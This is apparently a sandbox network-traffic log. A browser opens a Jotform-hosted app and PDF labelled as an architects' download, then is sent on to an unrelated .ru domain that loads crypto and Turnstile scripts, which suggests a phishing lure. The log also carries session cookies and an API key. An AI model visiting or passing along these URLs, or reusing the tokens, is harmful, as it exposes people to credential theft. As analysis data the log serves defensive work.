Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/6158.c797260a.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=180185-180185If-Range: "dc7d4d348fe1f99af4ac06d2a42b5088"
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=180185-188876If-Range: "dc7d4d348fe1f99af4ac06d2a42b5088"
Source: global trafficHTTP traffic detected: GET /server/check-olark-chat-support?from=app-builder HTTP/1.1Host: eu.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /app/250092704521347/manifest.json HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347If-Modified-Since: Fri, 10 Jan 2025 12:36:17 GMT
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /action?actor=guest_5a3c5173c0bb4f63&action=appViewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22utmSource%22:null,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347 HTTP/1.1Host: events.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://eu.jotform.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png HTTP/1.1Host: www.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /app/250092704521347/serviceWorker.js HTTP/1.1Host: eu.jotform.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://eu.jotform.com/app/250092704521347User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726 HTTP/1.1Host: eu-files.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=144&height=144&time=1736507717 HTTP/1.1Host: eu.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eu.jotform.com/app/250092704521347Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /s/umd/674ac14411e/for-push-notification.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/css/DocumentPreview.6d5451e5.chunk.css HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/5083.cbf741f8.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/5241.1f05701c.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /action?actor=guest_5a3c5173c0bb4f63&action=DocumentPreviewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22itemID%22:%221%22,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347 HTTP/1.1Host: events.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://eu.jotform.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/5083.cbf741f8.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/portal/674ac14411e/static/js/5241.1f05701c.js HTTP/1.1Host: cdn03.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf HTTP/1.1Host: www.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.js HTTP/1.1Host: cdn01.jotfor.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf HTTP/1.1Host: www.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://eu.jotform.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=WCrTkI0L9lPxBmDI1lEqmg&expires=1736512594 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740 HTTP/1.1Host: eu-files.jotform.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: nullSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740 HTTP/1.1Host: eu-files.jotform.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
Source: global trafficHTTP traffic detected: GET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oIZnEw3n/ HTTP/1.1Host: dm9h.zomivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
